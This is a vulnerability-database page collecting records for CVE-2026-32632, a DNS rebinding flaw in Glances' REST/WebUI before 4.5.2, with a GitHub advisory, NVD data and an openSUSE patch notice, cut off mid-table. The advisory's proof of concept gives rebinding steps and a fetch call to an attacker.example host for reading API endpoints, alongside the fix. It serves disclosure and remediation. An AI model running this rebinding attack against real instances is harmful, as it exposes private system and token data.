Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2026-32632 (GCVE-0-2026-32632)
Vulnerability from cvelistv5 – Published: 2026-03-18 17:47 – Updated: 2026-03-18 18:15
VLAI?
EPSS
Title
Glances's REST/WebUI Lacks Host Validation and Remains Exposed to DNS Rebinding
Summary
Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue.
Severity ?
5.9 (Medium)
CWE
- CWE-346 - Origin Validation Error
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://github.com/nicolargo/glances/security/adv… | x_refsource_CONFIRM |
| https://github.com/nicolargo/glances/commit/5850c… | x_refsource_MISC |
| https://github.com/nicolargo/glances/releases/tag… | x_refsource_MISC |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-32632",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-18T18:15:48.491743Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T18:15:59.648Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "glances",
"vendor": "nicolargo",
"versions": [
{
"status": "affected",
"version": "\u003c 4.5.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-346",
"description": "CWE-346: Origin Validation Error",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-18T17:47:25.929Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9"
},
{
"name": "https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9"
},
{
"name": "https://github.com/nicolargo/glances/releases/tag/v4.5.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
}
],
"source": {
"advisory": "GHSA-hhcg-r27j-fhv9",
"discovery": "UNKNOWN"
},
"title": "Glances\u0027s REST/WebUI Lacks Host Validation and Remains Exposed to DNS Rebinding"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-32632",
"datePublished": "2026-03-18T17:47:25.929Z",
"dateReserved": "2026-03-12T15:29:36.559Z",
"dateUpdated": "2026-03-18T18:15:59.648Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-32632",
"date": "2026-05-24",
"epss": "0.00024",
"percentile": "0.07048"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-32632\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-18T18:16:28.760\",\"lastModified\":\"2026-03-19T19:06:36.183\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N\",\"baseScore\":5.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.6,\"impactScore\":4.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-346\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.5.2\",\"matchCriteriaId\":\"3FC19E01-80F1-43BB-912C-39FE99143A59\"}]}]}],\"references\":[{\"url\":\"https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/nicolargo/glances/releases/tag/v4.5.2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-32632\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-18T18:15:48.491743Z\"}}}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-18T18:15:40.423Z\"}}], \"cna\": {\"title\": \"Glances\u0027s REST/WebUI Lacks Host Validation and Remains Exposed to DNS Rebinding\", \"source\": {\"advisory\": \"GHSA-hhcg-r27j-fhv9\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"nicolargo\", \"product\": \"glances\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.5.2\"}]}], \"references\": [{\"url\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9\", \"name\": \"https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9\", \"name\": \"https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.2\", \"name\": \"https://github.com/nicolargo/glances/releases/tag/v4.5.2\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-346\", \"description\": \"CWE-346: Origin Validation Error\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-18T17:47:25.929Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-32632\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-18T18:15:59.648Z\", \"dateReserved\": \"2026-03-12T15:29:36.559Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-18T17:47:25.929Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-32632
Vulnerability from fkie_nvd - Published: 2026-03-18 18:16 - Updated: 2026-03-19 19:06
Severity ?
Summary
Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:nicolargo:glances:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3FC19E01-80F1-43BB-912C-39FE99143A59",
"versionEndExcluding": "4.5.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Glances is an open-source system cross-platform monitoring tool. Glances recently added DNS rebinding protection for the MCP endpoint, but prior to version 4.5.2, the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist. As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin. This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target. Version 4.5.2 contains a patch for the issue."
},
{
"lang": "es",
"value": "Glances es una herramienta de monitoreo de sistema de c\u00f3digo abierto multiplataforma. Glances a\u00f1adi\u00f3 recientemente protecci\u00f3n contra DNS rebinding para el endpoint MCP, pero antes de la versi\u00f3n 4.5.2, la aplicaci\u00f3n principal FastAPI REST/WebUI todav\u00eda acepta encabezados \u0027Host\u0027 arbitrarios y no aplica \u0027TrustedHostMiddleware\u0027 o una lista de permitidos de host equivalente. Como resultado, la API REST, la WebUI y el endpoint de token permanecen accesibles a trav\u00e9s de dominios controlados por el atacante en escenarios cl\u00e1sicos de DNS rebinding. Una vez que el navegador v\u00edctima ha reasociado el dominio del atacante al servicio Glances, la pol\u00edtica de mismo origen ya no protege la API porque el navegador considera que el dominio de reasociaci\u00f3n es el origen. Este es un problema distinto de la debilidad CORS predeterminada reportada anteriormente. CORS no es necesario para la explotaci\u00f3n aqu\u00ed porque el DNS rebinding hace que el navegador v\u00edctima trate el dominio malicioso como de mismo origen con el objetivo de rebinding. La versi\u00f3n 4.5.2 contiene un parche para el problema."
}
],
"id": "CVE-2026-32632",
"lastModified": "2026-03-19T19:06:36.183",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-03-18T18:16:28.760",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9"
},
{
"source": "security-advisories@github.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-346"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-HHCG-R27J-FHV9
Vulnerability from github – Published: 2026-03-16 16:34 – Updated: 2026-03-18 21:48
VLAI?
Summary
Glances's REST/WebUI Lacks Host Validation and Remains Exposed to DNS Rebinding
Details
Summary
Glances recently added DNS rebinding protection for the MCP endpoint, but the main REST/WebUI FastAPI application still accepts arbitrary Host headers and does not apply TrustedHostMiddleware or an equivalent host allowlist.
As a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin.
This is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target.
Details
The MCP endpoint now has explicit host-based transport security:
# glances/outputs/glances_mcp.py
self.mcp_allowed_hosts = ["localhost", "127.0.0.1"]
...
return TransportSecuritySettings(
allowed_hosts=allowed_hosts,
allowed_origins=allowed_origins,
)
However, the main FastAPI application for REST/WebUI/token routes is initialized without any host validation middleware:
# glances/outputs/glances_restful_api.py
self._app = FastAPI(default_response_class=GlancesJSONResponse)
...
self._app.add_middleware(
CORSMiddleware,
allow_origins=config.get_list_value('outputs', 'cors_origins', default=["*"]),
allow_credentials=config.get_bool_value('outputs', 'cors_credentials', default=True),
allow_methods=config.get_list_value('outputs', 'cors_methods', default=["*"]),
allow_headers=config.get_list_value('outputs', 'cors_headers', default=["*"]),
)
...
if self.args.password and self._jwt_handler is not None:
self._app.include_router(self._token_router())
self._app.include_router(self._router())
There is no TrustedHostMiddleware, no comparison against the configured bind host, and no allowlist enforcement for HTTP Host values on the REST/WebUI surface.
The default bind configuration also exposes the service on all interfaces:
# glances/main.py
parser.add_argument(
'-B',
'--bind',
default='0.0.0.0',
dest='bind_address',
help='bind server to the given IPv4/IPv6 address or hostname',
)
This combination means the HTTP service will typically be reachable from the victim machine under an attacker-selected hostname once DNS is rebound to the Glances listener.
The token endpoint is also mounted on the same unprotected FastAPI app:
# glances/outputs/glances_restful_api.py
def _token_router(self) -> APIRouter:
...
router.add_api_route(f'{base_path}/token', self._api_token, methods=['POST'], dependencies=[])
Why This Is Exploitable
In a DNS rebinding attack:
- The attacker serves JavaScript from
https://attacker.example. - The victim visits that page while a Glances instance is reachable on the victim network.
- The attacker's DNS for
attacker.exampleis rebound from the attacker's server to the Glances IP address. - The victim browser now sends same-origin requests to
https://attacker.example, but those requests are delivered to Glances. - Because the Glances REST/WebUI app does not validate the
Hostheader or enforce an allowed-host policy, it serves the response. - The attacker-controlled JavaScript can read the response as same-origin content.
The MCP code already acknowledges this threat model and implements host-level defenses. The REST/WebUI code path does not.
Proof of Concept
This issue is code-validated by inspection of the current implementation:
- REST/WebUI/token are all mounted on a plain
FastAPI(...)app - no
TrustedHostMiddlewareor equivalent host validation is applied - default bind is
0.0.0.0 - MCP has separate rebinding protection, showing the project already recognizes the threat model
In a live deployment, the expected verification is:
# Victim-accessible Glances service
glances -w
# Attacker-controlled rebinding domain first resolves to attacker infra,
# then rebinds to the victim-local Glances IP.
# After rebind, attacker JS can fetch:
fetch("http://attacker.example:61208/api/4/status")
.then(r => r.text())
.then(console.log)
And if the operator exposes Glances without --password (supported and common), the attacker can read endpoints such as:
GET /api/4/status
GET /api/4/all
GET /api/4/config
GET /api/4/args
GET /api/4/serverslist
Even on password-enabled deployments, the missing host validation still leaves the REST/WebUI/token surface reachable through rebinding and increases the value of chains with other authenticated browser issues.
Impact
- Remote read of local/internal REST data: DNS rebinding can expose Glances instances that were intended to be reachable only from a local or internal network context.
- Bypass of origin-based browser isolation: Same-origin policy no longer protects the API once the browser accepts the attacker-controlled rebinding host as the origin.
- High-value chaining surface: This expands the exploitability of previously identified Glances issues involving permissive CORS, credential-bearing API responses, and state-changing authenticated endpoints.
- Token surface exposure: The JWT token route is mounted on the same host-unvalidated app and is therefore also reachable through the rebinding path.
Recommended Fix
Apply host allowlist enforcement to the main REST/WebUI FastAPI app, similar in spirit to the MCP hardening:
from starlette.middleware.trustedhost import TrustedHostMiddleware
allowed_hosts = config.get_list_value(
'outputs',
'allowed_hosts',
default=['localhost', '127.0.0.1'],
)
self._app.add_middleware(TrustedHostMiddleware, allowed_hosts=allowed_hosts)
At minimum:
- reject requests whose
Hostheader does not match an explicit allowlist - do not rely on
0.0.0.0bind semantics as an access-control boundary - document that reverse-proxy deployments must set a strict host allowlist
References
glances/outputs/glances_mcp.pyglances/outputs/glances_restful_api.pyglances/main.py
Severity ?
5.9 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Glances"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.5.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32632"
],
"database_specific": {
"cwe_ids": [
"CWE-346"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-16T16:34:23Z",
"nvd_published_at": "2026-03-18T18:16:28Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nGlances recently added DNS rebinding protection for the MCP endpoint, but the main REST/WebUI FastAPI application still accepts arbitrary `Host` headers and does not apply `TrustedHostMiddleware` or an equivalent host allowlist.\n\nAs a result, the REST API, WebUI, and token endpoint remain reachable through attacker-controlled domains in classic DNS rebinding scenarios. Once the victim browser has rebound the attacker domain to the Glances service, same-origin policy no longer protects the API because the browser considers the rebinding domain to be the origin.\n\nThis is a distinct issue from the previously reported default CORS weakness. CORS is not required for exploitation here because DNS rebinding causes the victim browser to treat the malicious domain as same-origin with the rebinding target.\n\n## Details\n\nThe MCP endpoint now has explicit host-based transport security:\n\n```python\n# glances/outputs/glances_mcp.py\nself.mcp_allowed_hosts = [\"localhost\", \"127.0.0.1\"]\n...\nreturn TransportSecuritySettings(\n allowed_hosts=allowed_hosts,\n allowed_origins=allowed_origins,\n)\n```\n\nHowever, the main FastAPI application for REST/WebUI/token routes is initialized without any host validation middleware:\n\n```python\n# glances/outputs/glances_restful_api.py\nself._app = FastAPI(default_response_class=GlancesJSONResponse)\n...\nself._app.add_middleware(\n CORSMiddleware,\n allow_origins=config.get_list_value(\u0027outputs\u0027, \u0027cors_origins\u0027, default=[\"*\"]),\n allow_credentials=config.get_bool_value(\u0027outputs\u0027, \u0027cors_credentials\u0027, default=True),\n allow_methods=config.get_list_value(\u0027outputs\u0027, \u0027cors_methods\u0027, default=[\"*\"]),\n allow_headers=config.get_list_value(\u0027outputs\u0027, \u0027cors_headers\u0027, default=[\"*\"]),\n)\n...\nif self.args.password and self._jwt_handler is not None:\n self._app.include_router(self._token_router())\nself._app.include_router(self._router())\n```\n\nThere is no `TrustedHostMiddleware`, no comparison against the configured bind host, and no allowlist enforcement for HTTP `Host` values on the REST/WebUI surface.\n\nThe default bind configuration also exposes the service on all interfaces:\n\n```python\n# glances/main.py\nparser.add_argument(\n \u0027-B\u0027,\n \u0027--bind\u0027,\n default=\u00270.0.0.0\u0027,\n dest=\u0027bind_address\u0027,\n help=\u0027bind server to the given IPv4/IPv6 address or hostname\u0027,\n)\n```\n\nThis combination means the HTTP service will typically be reachable from the victim machine under an attacker-selected hostname once DNS is rebound to the Glances listener.\n\nThe token endpoint is also mounted on the same unprotected FastAPI app:\n\n```python\n# glances/outputs/glances_restful_api.py\ndef _token_router(self) -\u003e APIRouter:\n ...\n router.add_api_route(f\u0027{base_path}/token\u0027, self._api_token, methods=[\u0027POST\u0027], dependencies=[])\n```\n\n## Why This Is Exploitable\n\nIn a DNS rebinding attack:\n\n1. The attacker serves JavaScript from `https://attacker.example`.\n2. The victim visits that page while a Glances instance is reachable on the victim network.\n3. The attacker\u0027s DNS for `attacker.example` is rebound from the attacker\u0027s server to the Glances IP address.\n4. The victim browser now sends same-origin requests to `https://attacker.example`, but those requests are delivered to Glances.\n5. Because the Glances REST/WebUI app does not validate the `Host` header or enforce an allowed-host policy, it serves the response.\n6. The attacker-controlled JavaScript can read the response as same-origin content.\n\nThe MCP code already acknowledges this threat model and implements host-level defenses. The REST/WebUI code path does not.\n\n## Proof of Concept\n\nThis issue is code-validated by inspection of the current implementation:\n\n- REST/WebUI/token are all mounted on a plain `FastAPI(...)` app\n- no `TrustedHostMiddleware` or equivalent host validation is applied\n- default bind is `0.0.0.0`\n- MCP has separate rebinding protection, showing the project already recognizes the threat model\n\nIn a live deployment, the expected verification is:\n\n```bash\n# Victim-accessible Glances service\nglances -w\n\n# Attacker-controlled rebinding domain first resolves to attacker infra,\n# then rebinds to the victim-local Glances IP.\n# After rebind, attacker JS can fetch:\nfetch(\"http://attacker.example:61208/api/4/status\")\n .then(r =\u003e r.text())\n .then(console.log)\n```\n\nAnd if the operator exposes Glances without `--password` (supported and common), the attacker can read endpoints such as:\n\n```bash\nGET /api/4/status\nGET /api/4/all\nGET /api/4/config\nGET /api/4/args\nGET /api/4/serverslist\n```\n\nEven on password-enabled deployments, the missing host validation still leaves the REST/WebUI/token surface reachable through rebinding and increases the value of chains with other authenticated browser issues.\n\n## Impact\n\n- **Remote read of local/internal REST data:** DNS rebinding can expose Glances instances that were intended to be reachable only from a local or internal network context.\n- **Bypass of origin-based browser isolation:** Same-origin policy no longer protects the API once the browser accepts the attacker-controlled rebinding host as the origin.\n- **High-value chaining surface:** This expands the exploitability of previously identified Glances issues involving permissive CORS, credential-bearing API responses, and state-changing authenticated endpoints.\n- **Token surface exposure:** The JWT token route is mounted on the same host-unvalidated app and is therefore also reachable through the rebinding path.\n\n## Recommended Fix\n\nApply host allowlist enforcement to the main REST/WebUI FastAPI app, similar in spirit to the MCP hardening:\n\n```python\nfrom starlette.middleware.trustedhost import TrustedHostMiddleware\n\nallowed_hosts = config.get_list_value(\n \u0027outputs\u0027,\n \u0027allowed_hosts\u0027,\n default=[\u0027localhost\u0027, \u0027127.0.0.1\u0027],\n)\n\nself._app.add_middleware(TrustedHostMiddleware, allowed_hosts=allowed_hosts)\n```\n\nAt minimum:\n\n- reject requests whose `Host` header does not match an explicit allowlist\n- do not rely on `0.0.0.0` bind semantics as an access-control boundary\n- document that reverse-proxy deployments must set a strict host allowlist\n\n## References\n\n- `glances/outputs/glances_mcp.py`\n- `glances/outputs/glances_restful_api.py`\n- `glances/main.py`",
"id": "GHSA-hhcg-r27j-fhv9",
"modified": "2026-03-18T21:48:39Z",
"published": "2026-03-16T16:34:23Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/security/advisories/GHSA-hhcg-r27j-fhv9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32632"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/commit/5850c564ee10804fdf884823b9c210eb954dd1f9"
},
{
"type": "PACKAGE",
"url": "https://github.com/nicolargo/glances"
},
{
"type": "WEB",
"url": "https://github.com/nicolargo/glances/releases/tag/v4.5.2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Glances\u0027s REST/WebUI Lacks Host Validation and Remains Exposed to DNS Rebinding"
}
OPENSUSE-SU-2026:10415-1
Vulnerability from csaf_opensuse - Published: 2026-03-24 00:00 - Updated: 2026-03-24 00:00Summary
glances-common-4.5.2-1.1 on GA media
Severity
Moderate
Notes
Title of the patch: glances-common-4.5.2-1.1 on GA media
Description of the patch: These are all security issues fixed in the glances-common-4.5.2-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames: openSUSE-Tumbleweed-2026-10415
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
7.5 (High)
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python311-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:python313-Glances-4.5.2-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
12 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:glances-common-4.5.2-1.1.ppc64le | — |
Vendor Fix
